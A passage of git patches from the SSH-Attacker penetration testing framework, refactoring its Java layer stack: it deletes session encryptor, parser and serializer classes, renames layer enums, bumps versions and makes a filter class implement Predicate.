a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/crypto/SessionEncryptor.java +++ /dev/null @@ -1,61 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.crypto; - -import de.rub.nds.sshattacker.core.exceptions.CryptoException; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.session.Session; -import de.rub.nds.sshattacker.core.session.cipher.SessionCipher; -import de.rub.nds.sshattacker.core.session.cipher.SessionCipherFactory; -import de.rub.nds.sshattacker.core.session.cipher.SessionNullCipher; -import java.math.BigInteger; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class SessionEncryptor extends Encryptor { - - private static final Logger LOGGER = LogManager.getLogger(); - - private final SshContext sshContext; - - private final SessionNullCipher nullCipher; - - public SessionEncryptor(SessionCipher sessionCipher, SshContext sshContext) { - super(sessionCipher); - this.sshContext = sshContext; - nullCipher = SessionCipherFactory.getNullCipher(sshContext); - } - - @Override - public void encrypt(Session session) { - LOGGER.debug("Encrypting Record:"); - SessionCipher sessionCipher; - sessionCipher = getSessionMostRecentCipher(); - /*if (sshContext.getChooser().getSelectedProtocolVersion().isDTLS()) { - sessionCipher = getSessionCipher(session.getEpoch().getValue()); - } else { - sessionCipher = getSessionMostRecentCipher(); - }*/ - try { - session.setSequenceNumber( - BigInteger.valueOf(sessionCipher.getState().getWriteSequenceNumber())); - sessionCipher.encrypt(session); - } catch (CryptoException ex) { - LOGGER.warn("Could not encrypt BlobRecord. Using NullCipher", ex); - try { - nullCipher.encrypt(session); - } catch (CryptoException ex1) { - LOGGER.error("Could not encrypt with NullCipher", ex1); - } - } - sessionCipher.getState().increaseWriteSequenceNumber(); - /*if (sshContext.getChooser().getSelectedProtocolVersion().isTLS13()) { - session.getComputations().setUsedTls13KeySetType(sshContext.getActiveKeySetTypeWrite()); - }*/ - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/parser/SessionParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/parser/SessionParser.java deleted file mode 100644 index 0aa573aa6..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/parser/SessionParser.java +++ /dev/null @@ -1,107 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.parser; - -/* -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; -import de.rub.nds.sshattacker.core.constants.ProtocolVersion; - */ - -import de.rub.nds.sshattacker.core.constants.SessionByteLength; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.data.Parser; -import de.rub.nds.sshattacker.core.session.Session; -import java.io.InputStream; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class SessionParser extends Parser { - - private static final Logger LOGGER = LogManager.getLogger(); - - // private final ProtocolVersion version; - private final SshContext sshContext; - - /*public SessionParser(InputStream stream, ProtocolVersion version, SshContext sshContext) { - super(stream); - //this.version = version; - this.sshContext = sshContext; - }*/ - - public SessionParser(SshContext sshContext, InputStream stream) { - super(stream); - // this.version = version; - this.sshContext = sshContext; - } - - @Override - public void parse(Session session) { - LOGGER.debug("Parsing Record"); - /*parseContentType(session); - ProtocolMessageType protocolMessageType = - ProtocolMessageType.getContentType(session.getContentType().getValue()); - if (protocolMessageType == null) { - protocolMessageType = ProtocolMessageType.UNKNOWN; - } - session.setContentMessageType(protocolMessageType); - parseVersion(session); - if (version.isDTLS()) { - parseEpoch(session); - parseSequenceNumber(session); - if (protocolMessageType == ProtocolMessageType.TLS12_CID) { - parseConnectionId(session); - } - } - parseLength(session); - parseProtocolMessageBytes(session); - session.setCompleteRecordBytes(getAlreadyParsed());*/ - } - - private void parseEpoch(Session session) { - session.setEpoch(parseIntField(SessionByteLength.DTLS_EPOCH)); - LOGGER.debug("Epoch: " + session.getEpoch().getValue()); - } - - private void parseSequenceNumber(Session session) { - session.setSequenceNumber(parseBigIntField(SessionByteLength.DTLS_SEQUENCE_NUMBER)); - LOGGER.debug("SequenceNumber: " + session.getSequenceNumber().getValue()); - } - - private void parseConnectionId(Session session) { - /*int connectionIdLength = - sshContext - .getRecordLayer() - .getDecryptor() - .getRecordCipher(session.getEpoch().getValue()) - .getState() - .getConnectionId() - .length; - session.setConnectionId(parseByteArrayField(connectionIdLength));*/ - LOGGER.debug("ConnectionID: {}", session.getConnectionId().getValue()); - } - - private void parseContentType(Session session) { - session.setContentType(parseByteField(SessionByteLength.CONTENT_TYPE)); - LOGGER.debug("ContentType: " + session.getContentType().getValue()); - } - - private void parseVersion(Session session) { - session.setProtocolVersion(parseByteArrayField(SessionByteLength.PROTOCOL_VERSION)); - LOGGER.debug("ProtocolVersion: {}", session.getProtocolVersion().getValue()); - } - - private void parseLength(Session session) { - session.setLength(parseIntField(SessionByteLength.RECORD_LENGTH)); - LOGGER.debug("Length: " + session.getLength().getValue()); - } - - private void parseProtocolMessageBytes(Session session) { - session.setProtocolMessageBytes(parseByteArrayField(session.getLength().getValue())); - LOGGER.debug("ProtocolMessageBytes: {}", session.getProtocolMessageBytes().getValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/preparator/SessionPreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/preparator/SessionPreparator.java deleted file mode 100644 index 01b1e0466..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/preparator/SessionPreparator.java +++ /dev/null @@ -1,115 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.preparator; - -/*import de.rub.nds.sshattacker.core.record.compressor.RecordCompressor; -import de.rub.nds.sshattacker.core.record.crypto.Encryptor; -import de.rub.nds.sshattacker.core.constants.ProtocolVersion; -import de.rub.nds.sshattacker.core.constants.Tls13KeySetType;*/ - -import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.layer.data.Preparator; -import de.rub.nds.sshattacker.core.session.Session; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -/** The cleanRecordBytes should be set when the record preparator received the record */ -public class SessionPreparator extends Preparator { - - private static final Logger LOGGER = LogManager.getLogger(); - - private final Session session; - // private final Encryptor encryptor; - private final SshContext sshContext; - // private final RecordCompressor compressor; - - private ProtocolMessageType type; - - public SessionPreparator( - SshContext sshContext, - Session session, - // Encryptor encryptor, - ProtocolMessageType type) { - // RecordCompressor compressor) { - super(sshContext.getChooser(), session); - this.session = session; - // this.encryptor = encryptor; - this.sshContext = sshContext; - // this.compressor = compressor; - this.type = type; - } - - @Override - public void prepare() { - LOGGER.debug("Preparing Record"); - prepareConnectionId(session); - session.prepareComputations(); - prepareContentType(session); - prepareProtocolVersion(session); - // compressor.compress(session); - encrypt(); - } - - public void encrypt() { - LOGGER.debug("Encrypting Record"); - /*if (chooser.getSelectedProtocolVersion().isTLS13() - && session.getContentMessageType() == ProtocolMessageType.CHANGE_CIPHER_SPEC - && !chooser.getConfig().isEncryptChangeCipherSpec()) { - // The CCS message in TLS 1.3 is an exception that does not get - // encrypted - session.prepareComputations(); - session.setProtocolMessageBytes(session.getCleanProtocolMessageBytes().getValue()); - } else { - encryptor.encrypt(session); - } - prepareLength(session);*/ - } - - private void prepareConnectionId(Session session) { - /*if (chooser.getSelectedProtocolVersion().isDTLS()) { - RecordLayer recordLayer = sshContext.getRecordLayer(); - byte[] connectionId = - recordLayer - .getEncryptor() - .getRecordCipher(recordLayer.getWriteEpoch()) - .getState() - .getConnectionId(); - if (connectionId != null) { - session.setConnectionId(connectionId); - LOGGER.debug("ConnectionId: {}", session.getConnectionId().getValue()); - } - }*/ - } - - private void prepareContentType(Session session) { - session.setContentType(type.getValue()); - LOGGER.debug("ContentType: " + type.getValue()); - prepareContentMessageType(type); - } - - private void prepareProtocolVersion(Session session) { - /*if (chooser.getSelectedProtocolVersion().isTLS13() - || sshContext.getActiveKeySetTypeWrite() == Tls13KeySetType.EARLY_TRAFFIC_SECRETS) { - session.setProtocolVersion(ProtocolVersion.TLS12.getValue()); - } else { - session.setProtocolVersion(chooser.getSelectedProtocolVersion().getValue()); - } - LOGGER.debug("ProtocolVersion: {}", session.getProtocolVersion().getValue());*/ - } - - private void prepareLength(Session session) { - session.setLength(session.getProtocolMessageBytes().getValue().length); - LOGGER.debug("Length: " + session.getLength().getValue()); - } - - protected void prepareContentMessageType(ProtocolMessageType type) { - // getObject().setContentMessageType(this.type); - LOGGER.debug("ContentMessageType: {}", type.getArrayValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/serializer/SessionSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/serializer/SessionSerializer.java deleted file mode 100644 index f5c72af01..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/serializer/SessionSerializer.java +++ /dev/null @@ -1,78 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.session.serializer; - -import de.rub.nds.sshattacker.core.constants.SessionByteLength; -import de.rub.nds.sshattacker.core.layer.data.Serializer; -import de.rub.nds.sshattacker.core.session.Session; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class SessionSerializer extends Serializer { - - private static final Logger LOGGER = LogManager.getLogger(); - - private final Session session; - - public SessionSerializer(Session session) { - this.session = session; - } - - @Override - protected byte[] serializeBytes() { - LOGGER.debug("Serializing Record"); - writeContentType(session); - writeProtocolVersion(session); - if (session.getEpoch() != null) { - writeEpoch(session); - writeSequenceNumber(session); - } - if (session.getConnectionId() != null) { - writeConnectionId(session); - } - writeLength(session); - writeProtocolMessageBytes(session); - return getAlreadySerialized(); - } - - private void writeContentType(Session session) { - appendByte(session.getContentType().getValue()); - LOGGER.debug("ContentType: " + session.getContentType().getValue()); - } - - private void writeProtocolVersion(Session session) { - appendBytes(session.getProtocolVersion().getValue()); - LOGGER.debug("ProtocolVersion: {}", session.getProtocolVersion().getValue()); - } - - private void writeLength(Session session) { - appendInt(session.getLength().getValue(), SessionByteLength.RECORD_LENGTH); - LOGGER.debug("Length: " + session.getLength().getValue()); - } - - private void writeConnectionId(Session session) { - appendBytes(session.getConnectionId().getValue()); - LOGGER.debug("ConnectionID: {}", session.getConnectionId().getValue()); - } - - private void writeEpoch(Session session) { - appendInt(session.getEpoch().getValue(), SessionByteLength.DTLS_EPOCH); - LOGGER.debug("Epoch: " + session.getEpoch().getValue()); - } - - private void writeSequenceNumber(Session session) { - appendBigInteger( - session.getSequenceNumber().getValue(), SessionByteLength.DTLS_SEQUENCE_NUMBER); - LOGGER.debug("SequenceNumber: " + session.getSequenceNumber().getValue()); - } - - private void writeProtocolMessageBytes(Session session) { - appendBytes(session.getProtocolMessageBytes().getValue()); - LOGGER.debug("ProtocolMessageBytes: {}", session.getProtocolMessageBytes().getValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java index 4a57e063b..e00f74022 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java @@ -118,12 +118,9 @@ public void execute(State state) throws WorkflowExecutionException { initLoggingSide(receiveFromCtx); - // Reihenfolge TLS Attacker: Recive, Apply, Forward receiveMessages(receiveFromCtx); applyMessages(forwardToCtx); forwardMessages(forwardToCtx); - // handleReceivedMessages(receiveFromCtx); - } protected void receiveMessages(SshContext receiveFromCtx) { @@ -132,7 +129,7 @@ protected void receiveMessages(SshContext receiveFromCtx) { LayerStack layerStack = receiveFromCtx.getLayerStack(); LayerConfiguration messageConfiguration = - new SpecificReceiveLayerConfiguration(ImplementedLayers.SSHv2, messages); + new SpecificReceiveLayerConfiguration(ImplementedLayers.SSHV2, messages); List layerConfigurationList = sortLayerConfigurations(layerStack, messageConfiguration); @@ -142,12 +139,12 @@ protected void receiveMessages(SshContext receiveFromCtx) { receivedMessages = new ArrayList<>( processingResult - .getResultForLayer(ImplementedLayers.SSHv2) + .getResultForLayer(ImplementedLayers.SSHV2) .getUsedContainers()); receivedPackets = new ArrayList<>( processingResult - .getResultForLayer(ImplementedLayers.TransportLayer) + .getResultForLayer(ImplementedLayers.PACKET_LAYER) .getUsedContainers()); String expected = getReadableString(receivedMessages); @@ -179,10 +176,10 @@ protected void forwardMessages(SshContext forwardToCtx) { try { LayerStack layerStack = forwardToCtx.getLayerStack(); LayerConfiguration messageConfiguration = - new SpecificSendLayerConfiguration(ImplementedLayers.SSHv2, receivedMessages); + new SpecificSendLayerConfiguration(ImplementedLayers.SSHV2, receivedMessages); LayerConfiguration packetConfiguration = new SpecificSendLayerConfiguration( - ImplementedLayers.TransportLayer, receivedPackets); + ImplementedLayers.PACKET_LAYER, receivedPackets); List layerConfigurationList = sortLayerConfigurations(layerStack, messageConfiguration, packetConfiguration); @@ -192,12 +189,12 @@ protected void forwardMessages(SshContext forwardToCtx) { sendMessages = new ArrayList<>( processingResult - .getResultForLayer(ImplementedLayers.SSHv2) + .getResultForLayer(ImplementedLayers.SSHV2) .getUsedContainers()); sendPackets = new ArrayList<>( processingResult - .getResultForLayer(ImplementedLayers.TransportLayer) + .getResultForLayer(ImplementedLayers.PACKET_LAYER) .getUsedContainers()); executedAsPlanned = checkMessageListsEquals(sendMessages, receivedMessages); @@ -235,7 +232,7 @@ protected void forwardMessages(SshContext forwardToCtx) { executedAsPlanned = checkMessageListsEquals(messages, receivedMessages); }*/ /** - * Apply the contents of the messages to the given TLS context. + * Apply the contents of the messages to the given SSH context. * * @param ctx */ diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index 103f5b181..b4b87e008 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -286,13 +286,13 @@ protected void send( LayerConfiguration ssh2Configuration = new SpecificSendLayerConfiguration<>( - ImplementedLayers.SSHv2, protocolMessagesToSend); + ImplementedLayers.SSHV2, protocolMessagesToSend); LayerConfiguration ssh1Configuration = new SpecificSendLayerConfiguration<>( - ImplementedLayers.SSHv1, protocolMessagesToSend); + ImplementedLayers.SSHV1, protocolMessagesToSend); LayerConfiguration transportConfiguration = new SpecificSendLayerConfiguration<>( - ImplementedLayers.TransportLayer, packetsToSend); + ImplementedLayers.PACKET_LAYER, packetsToSend); List layerConfigurationList = sortLayerConfigurations( @@ -302,27 +302,27 @@ protected void send( } private void setContainers(LayerStackProcessingResult processingResults) { - if (processingResults.getResultForLayer(ImplementedLayers.SSHv2) != null) { + if (processingResults.getResultForLayer(ImplementedLayers.SSHV2) != null) { messages = new ArrayList<>( processingResults - .getResultForLayer(ImplementedLayers.SSHv2) + .getResultForLayer(ImplementedLayers.SSHV2) .getUsedContainers()); } - if (processingResults.getResultForLayer(ImplementedLayers.SSHv1) != null) { + if (processingResults.getResultForLayer(ImplementedLayers.SSHV1) != null) { messages = new ArrayList<>( processingResults - .getResultForLayer(ImplementedLayers.SSHv1) + .getResultForLayer(ImplementedLayers.SSHV1) .getUsedContainers()); } - if (processingResults.getResultForLayer(ImplementedLayers.TransportLayer) != null) { + if (processingResults.getResultForLayer(ImplementedLayers.PACKET_LAYER) != null) { packets = new ArrayList<>( processingResults - .getResultForLayer(ImplementedLayers.TransportLayer) + .getResultForLayer(ImplementedLayers.PACKET_LAYER) .getUsedContainers()); } } @@ -348,11 +348,11 @@ protected void receive( private List getGenericReceiveConfigurations(LayerStack layerStack) { List layerConfigurationList; LayerConfiguration messageSsh2Configuration = - new GenericReceiveLayerConfiguration(ImplementedLayers.SSHv2); + new GenericReceiveLayerConfiguration(ImplementedLayers.SSHV2); LayerConfiguration messageSsh1Configuration = - new GenericReceiveLayerConfiguration(ImplementedLayers.SSHv1); + new GenericReceiveLayerConfiguration(ImplementedLayers.SSHV1); LayerConfiguration recordConfiguration = - new GenericReceiveLayerConfiguration(ImplementedLayers.TransportLayer); + new GenericReceiveLayerConfiguration(ImplementedLayers.PACKET_LAYER); layerConfigurationList = sortLayerConfigurations( layerStack, @@ -370,13 +370,13 @@ private List getSpecificReceiveConfigurations( LayerConfiguration messageSsh2Configuration = new SpecificReceiveLayerConfiguration<>( - ImplementedLayers.SSHv2, protocolMessagesToReceive); + ImplementedLayers.SSHV2, protocolMessagesToReceive); LayerConfiguration messageSsh1Configuration = new SpecificReceiveLayerConfiguration<>( - ImplementedLayers.SSHv1, protocolMessagesToReceive); + ImplementedLayers.SSHV1, protocolMessagesToReceive); LayerConfiguration recordConfiguration = new SpecificReceiveLayerConfiguration<>( - ImplementedLayers.TransportLayer, packetsToRecieve); + ImplementedLayers.PACKET_LAYER, packetsToRecieve); if (packetsToRecieve == null || packetsToRecieve.isEmpty()) { // always allow (trailing) records when no records were set // a ReceiveAction actually intended to expect no records is pointless diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java index 556497a07..21701389c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ProxyFilterMessagesAction.java @@ -89,10 +89,10 @@ protected void forwardMessages(SshContext forwardToCtx) { try { LayerStack layerStack = forwardToCtx.getLayerStack(); LayerConfiguration messageConfiguration = - new SpecificSendLayerConfiguration(ImplementedLayers.SSHv2, filteredMessages); + new SpecificSendLayerConfiguration(ImplementedLayers.SSHV2, filteredMessages); LayerConfiguration packetConfiguration = new SpecificSendLayerConfiguration( - ImplementedLayers.TransportLayer, receivedPackets); + ImplementedLayers.PACKET_LAYER, receivedPackets); List layerConfigurationList = sortLayerConfigurations(layerStack, messageConfiguration, packetConfiguration); @@ -102,12 +102,12 @@ protected void forwardMessages(SshContext forwardToCtx) { sendMessages = new ArrayList<>( processingResult - .getResultForLayer(ImplementedLayers.SSHv2) + .getResultForLayer(ImplementedLayers.SSHV2) .getUsedContainers()); sendPackets = new ArrayList<>( processingResult - .getResultForLayer(ImplementedLayers.TransportLayer) + .getResultForLayer(ImplementedLayers.PACKET_LAYER) .getUsedContainers()); executedAsPlanned = checkMessageListsEquals(sendMessages, filteredMessages); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index 73c6d0029..531a72fcd 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -307,6 +307,8 @@ public boolean executedAsPlanned() { // If no expected messages were defined, we consider this receive // action as "let's see what the other side sends". if (expectedMessages.isEmpty()) { + //TODO: Handle for SSH-Attacker + // FIXME: In case TLS-Attacker's `GenericReceiveAction` is ported // to SSH-Attacker at some point and the `messages` list is also // empty, it might make sense to log a warning that tells the user diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java index 68f00d907..091d33131 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java @@ -160,11 +160,11 @@ public List sortLayerConfigurations( LOGGER.warn( "Cannot assign layer " + layerType.getName() - + "to current LayerStack. LayerType not implemented for TLSAction."); + + "to current LayerStack. LayerType not implemented for SSHAction."); continue; } Optional layerConfiguration = Optional.empty(); - if (layer == ImplementedLayers.SSHv1 || layer == ImplementedLayers.SSHv2) { + if (layer == ImplementedLayers.SSHV1 || layer == ImplementedLayers.SSHV2) { layerConfiguration = unsortedLayerConfigurations.stream() .filter(layerConfig -> layerConfig.getLayerType().equals(layer)) diff --git a/SSH-Core/src/test/java/executing/NetcatWorkflow.java b/SSH-Core/src/test/java/executing/NetcatWorkflow.java index 4091503c8..623693c34 100755 --- a/SSH-Core/src/test/java/executing/NetcatWorkflow.java +++ b/SSH-Core/src/test/java/executing/NetcatWorkflow.java @@ -82,7 +82,6 @@ public static void main(String[] args) throws Exception { while (true) { // noinspection BusyWait Thread.sleep(5000); - // receiveMessageHelper.receiveMessages(state.getSshContext()); } } } diff --git a/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java b/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java index c720c0ae7..b39ae1580 100755 --- a/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java +++ b/SSH-Core/src/test/java/executing/NetcatWorkflowFactory.java @@ -38,12 +38,10 @@ public static void main(String[] args) throws Exception { while (true) { // noinspection BusyWait Thread.sleep(5000); - // receiveMessageHelper.receiveMessages(state.getSshContext()); String read = in.readLine(); ChannelDataMessage dataMessage = new ChannelDataMessage(); dataMessage.setRecipientChannelId(Modifiable.explicit(0)); dataMessage.setData((read + "\n").getBytes()); - // sendMessageHelper.sendMessage(state.getSshContext(), dataMessage); } } } diff --git a/SSH-Mitm/pom.xml b/SSH-Mitm/pom.xml index 8fa6d9619..e644aa710 100644 --- a/SSH-Mitm/pom.xml +++ b/SSH-Mitm/pom.xml @@ -4,7 +4,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.4-SNAPSHOT + 2.0.0-SNAPSHOT ssh-mitm diff --git a/SSH-Server/pom.xml b/SSH-Server/pom.xml index ca85633e7..38e062b7c 100644 --- a/SSH-Server/pom.xml +++ b/SSH-Server/pom.xml @@ -4,7 +4,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.4-SNAPSHOT + 2.0.0-SNAPSHOT ssh-server diff --git a/pom.xml b/pom.xml index 5e28b8d6d..b448fc29a 100644 --- a/pom.xml +++ b/pom.xml @@ -9,7 +9,7 @@ de.rub.nds.ssh.attacker ssh-attacker - 1.1.4-SNAPSHOT + 2.0.0-SNAPSHOT pom SSH-Attacker From ffea8d504e975f2075aef9cefcfc5fe779a349d8 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Fri, 11 Aug 2023 23:04:27 +0200 Subject: [PATCH 053/176] REV: make 'DataContainerFilter' implement 'Predicate' FunctionalInterface --- .../rub/nds/sshattacker/core/layer/DataContainerFilter.java | 6 ++++-- .../core/layer/SpecificReceiveLayerConfiguration.java | 4 ++-- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java index dbbcfa3b1..975fe7341 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java @@ -9,7 +9,9 @@ import de.rub.nds.sshattacker.core.layer.data.DataContainer; -public abstract class DataContainerFilter { +import java.util.function.Predicate; - public abstract boolean filterApplies(DataContainer container); +public abstract class DataContainerFilter implements Predicate> { + + public abstract boolean test(DataContainer container); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java index b6b1060bf..98c289691 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java @@ -16,7 +16,7 @@ * ReceiveConfiguration that receives a specific list of DataContainers. Any additional received * containers are marked as such. */ -public class SpecificReceiveLayerConfiguration +public class SpecificReceiveLayerConfiguration> extends ReceiveLayerConfiguration { private List containerFilterList; @@ -97,7 +97,7 @@ public void setContainerFilterList(DataContainerFilter... containerFilters) { public boolean containerCanBeFiltered(Container container) { if (getContainerFilterList() != null) { for (DataContainerFilter containerFilter : getContainerFilterList()) { - if (containerFilter.filterApplies(container)) { + if (containerFilter.test(container)) { return true; } } From 342e26f7237f26f4b069c17efb09375c754e69a4 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 12 Aug 2023 00:18:05 +0200 Subject: [PATCH 054/176] REV: Cleanup Comments and parametrize raw-class usage --- .../core/layer/DataContainerFilter.java | 1 - .../sshattacker/core/layer/LayerStack.java | 8 +-- .../SpecificReceiveLayerConfiguration.java | 2 +- .../layer/constant/LayerConfiguration.java | 4 +- .../core/layer/context/SshContext.java | 1 + .../core/layer/impl/PacketLayer.java | 58 +++++++++++++++++++ .../crypto/AbstractPacketDecryptor.java | 2 +- .../crypto/AbstractPacketEncryptor.java | 2 +- .../packet/handler/AbstractPacketHandler.java | 2 +- .../packet/layer/AbstractPacketLayer.java | 10 ++-- .../core/packet/layer/BinaryPacketLayer.java | 2 +- .../packet/parser/AbstractPacketParser.java | 2 +- .../serializer/AbstractPacketSerializer.java | 2 +- .../message/UserAuthBannerMessage.java | 4 +- .../protocol/connection/ChannelManager.java | 2 +- .../core/workflow/action/MessageAction.java | 3 +- .../core/workflow/action/ReceiveAction.java | 2 +- 17 files changed, 81 insertions(+), 26 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java index 975fe7341..b194fbc80 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/DataContainerFilter.java @@ -8,7 +8,6 @@ package de.rub.nds.sshattacker.core.layer; import de.rub.nds.sshattacker.core.layer.data.DataContainer; - import java.util.function.Predicate; public abstract class DataContainerFilter implements Predicate> { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java index 2d722cc0c..336fb0073 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java @@ -29,10 +29,10 @@ public class LayerStack { /** * The layer list, layer 0 is the highest layer, layer n is the lowest. Eg. For SSH layer 0 - * could be the SSHv1 layer, layer 1 the ssh transport layer 2 and - * layer 3 the tcp transport layer, layer 4 could be the ip layer layer 5 could be the ethernet - * layer. Not all layers need to be defined at any time, it is perfectly fine to leave the layer - * stack and plug another component in which does the rest of the processing + * could be the SSHv1 layer, layer 1 the ssh transport layer 2 and layer 3 the tcp transport + * layer, layer 4 could be the ip layer layer 5 could be the ethernet layer. Not all layers need + * to be defined at any time, it is perfectly fine to leave the layer stack and plug another + * component in which does the rest of the processing */ private final List layerList; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java index 98c289691..985856b42 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/SpecificReceiveLayerConfiguration.java @@ -16,7 +16,7 @@ * ReceiveConfiguration that receives a specific list of DataContainers. Any additional received * containers are marked as such. */ -public class SpecificReceiveLayerConfiguration> +public class SpecificReceiveLayerConfiguration> extends ReceiveLayerConfiguration { private List containerFilterList; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java index 201f7dd09..0a7ff691e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/constant/LayerConfiguration.java @@ -8,8 +8,8 @@ package de.rub.nds.sshattacker.core.layer.constant; /** - * Pre-defined configurations for the Layer Stack. E.g., SSHv1 will Create a Layerstack containing no SSHv2 Layer to - * the LayerStack. Custom LayerStack have to be created manually. + * Pre-defined configurations for the Layer Stack. E.g., SSHv1 will Create a Layerstack containing + * no SSHv2 Layer to the 